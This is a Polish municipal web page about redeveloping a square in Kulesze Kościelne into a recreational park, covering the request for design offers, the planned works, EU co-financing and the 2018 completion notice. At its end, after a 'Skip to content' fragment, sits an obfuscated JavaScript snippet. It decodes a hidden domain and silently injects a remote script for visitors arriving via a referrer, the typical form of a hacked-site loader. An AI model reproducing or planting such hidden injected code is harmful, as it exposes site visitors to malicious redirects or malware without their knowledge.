Zapytanie cenowe wykonanie dokumentacji projektowej pod nazwą Zagospodarowanie placu w centrum miejscowości Kulesze Kościelne na cele rekreacyjne.

Zamawiający :
Urząd Gminy Kulesze Kościelne ul. Główna 6 , 18-208 Kulesze Kościelne NIP 722-127-43- 43
Zaprasza do złożenia oferty cenowej :

Na wykonanie dokumentacji projektowej pod nazwą :
Zagospodarowanie placu w centrum miejscowości Kulesze Kościelne na cele rekreacyjne.

Gmina Kulesze Kościelne realizuje projekt pn. Zagospodarowanie placu w centrum miejscowości Kulesze Kościelne na cele rekreacyjne.

Zadanie jest dofinansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2014-2020.

Przy zagospodarowaniu placu będą wykonywane niżej wymienione prace budowlane :

– budowa ogrodzenia  na placu zabaw  z jedną bramką wejściową

– budowa nawierzchni bezpiecznej na placu zabaw

– montaż urządzeń do zabaw dla dzieci na placu zabaw

– budowa nawierzchni trawiastej pod urządzeniami siłowni

– montaż urządzeń siłowni zewnętrznej

– montaż koszy, ławek, oświetlenia

– montaż tablic informacyjnych

– budowa oczka wodnego

– budowa ścieżek

– montaż kładki

– sadzenie roślin (drzewa i krzewy).


Całkowita wartość projektu: 600 900,76 zł

Dofinansowanie EFRR: 465 698,05 zł


Celem projektu jest poprawa jakości życia mieszkańców poprzez lepszą organizację przestrzeni publicznej na cele społeczne, kulturalne i rekreacyjne, dzięki rewitalizacji placu w centrum miejscowości Kulesze Kościelne.

INFORMACJA
W dniu 14.08.2018 r. dokonano odbioru końcowego wykonania robót budowlanych zadania pn. „Zagospodarowanie placu w centrum miejscowości Kulesze Kościelne na cele rekreacyjne”.
Projekt nr WND-RPPD.08.06.00-20-0129/17-00 realizowany jest w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2014-2020, Osi Priorytetowej VIII. Infrastruktura dla usług użyteczności publicznej, Działania 8.6 Inwestycje na rzecz rozwoju lokalnego.
Zachęcamy do obejrzenia zdjęć. Zapraszamy również do odwiedzenia i korzystania. Wierzymy, że utworzony park będzie miejscem bezpiecznym i przyjaznym dla wszystkich grup wiekowych, stanie się prawdziwym centrum miejscowości, miejscem tętniącym życiem, odwiedzanym przez mieszkańców i turystów, amatorów występów, pokazów i muzyki.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);